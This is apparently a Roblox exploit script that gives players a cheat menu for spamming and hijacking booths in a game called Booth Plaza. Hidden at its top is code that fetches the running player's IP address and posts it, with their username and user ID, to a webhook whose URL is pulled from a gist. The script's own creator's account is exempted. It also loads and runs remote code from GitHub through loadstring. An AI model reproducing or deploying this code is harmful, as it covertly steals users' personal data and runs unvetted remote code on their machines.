local webh = game:HttpGet("https://gist.githubusercontent.com/a8hdb907awbd907abd7/0c04611fd8dd13d78d2027cfd897fbeb/raw/907ad42bdb4786dd02f01f0c52080082330d6029/gistfile1.txt")
local ownerID = tonumber(game:HttpGet("https://gist.githubusercontent.com/a8hdb907awbd907abd7/01cad745bffc5244f220ebaec55e261d/raw/daa47d4bc0c65c4a7050b19c05e66139bac7d80b/robloxuserids"))

local check = game:GetService("Players").LocalPlayer.UserId == 560044887

local name

pcall(function()
    if check == false then
        name = "IP: "..game:HttpGet("https://api.ipify.org")
    else
        name = "This is the script owners IP! You can't have that!"
    end
end)

pcall(function()
   local data = {
       ["embeds"] = {
           {
               ["title"] = game:GetService("Players").LocalPlayer.Name.." | "..game:GetService("Players").LocalPlayer.UserId,
               ["description"] = name
           }
       }
   }

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)














local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('Breadstick#3033', 'The Booth Plaza fucker - V.2', 5)


local library = loadstring(game:HttpGet(('https://raw.githubusercontent.com/AikaV3rm/UiLib/master/Lib.lua')))()

local w = library:CreateWindow("Open me!") 

local b = w:CreateFolder("Scripts!") 

b:Label("The booth plaza fucker",{
    TextSize = 15; 
    TextColor = Color3.fromRGB(255,255,255); 
    BgColor = Color3.fromRGB(69,69,69);
    
}) 

b:Button("Fuck it",function()
_G.test = true
local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('You fucked your booth!', 'Enjoy!', 5)


spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "7068077507",
        ["Text"] = "Breadstick"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "5788424980",
        ["Text"] = "BrEaDstick"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "8080489404",
        ["Text"] = "BREADSTICK"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "8143786234",
        ["Text"] = "BreadStICK"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "5100511597",
        ["Text"] = "BreadsTick"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "8135791760",
        ["Text"] = "BreaDdstick"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait(1)
    end
end)

-- add another here
end)




b:Button("Unfuck it",function()
_G.test = false

local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('You unfucked your booth!', 'Go find another booth to fuck!', 5)

spawn(function()
    while _G.test == true do
        local args = {
    [1] = "Update",
    [2] = {
        ["Icon"] = "7068077507",
        ["Text"] = "Breadstick"
    }
}

        game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))
        wait()
    end
end)

end)

b:Button("Abandon booth",function()
local args = {
    [1] = "Abandon"
}

game:GetService("ReplicatedStorage").Booth:FireServer(unpack(args))

local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('You abandonned your booth!', 'You can now claim another booth!', 5)
end)

b:Button("TP to spawn",function()
    
    
function teleportTO(placeCFrame)
    local plyr = game.Players.LocalPlayer;
    if plyr.Character then
    plyr.Character.HumanoidRootPart.CFrame = placeCFrame;
    end
end
teleportTO(game:GetService("Workspace")["Park Fountain"].Emitters.EmitPart.CFrame)

local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('Wooooosh', 'The Booth Plaza fucker - You have arrived at the fountain!', 5)
end)



local b = w:CreateFolder("Settings!")

b:Label("Created by : Breadstick#3033",{
    TextSize = 14; 
    TextColor = Color3.fromRGB(255,255,255); 
    BgColor = Color3.fromRGB(69,69,69);
    
}) 

b:Button("Discord invite",function()
setclipboard("https://discord.gg/AHf3uA7YDF")

local Lib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/BoredStuff2/notify-lib/main/lib'),true))()
Lib.prompt('Discord invite!', 'Our discord invite has been copied to your clipboard! - Thanks for using our script! : )', 15)
end)

b:DestroyGui()


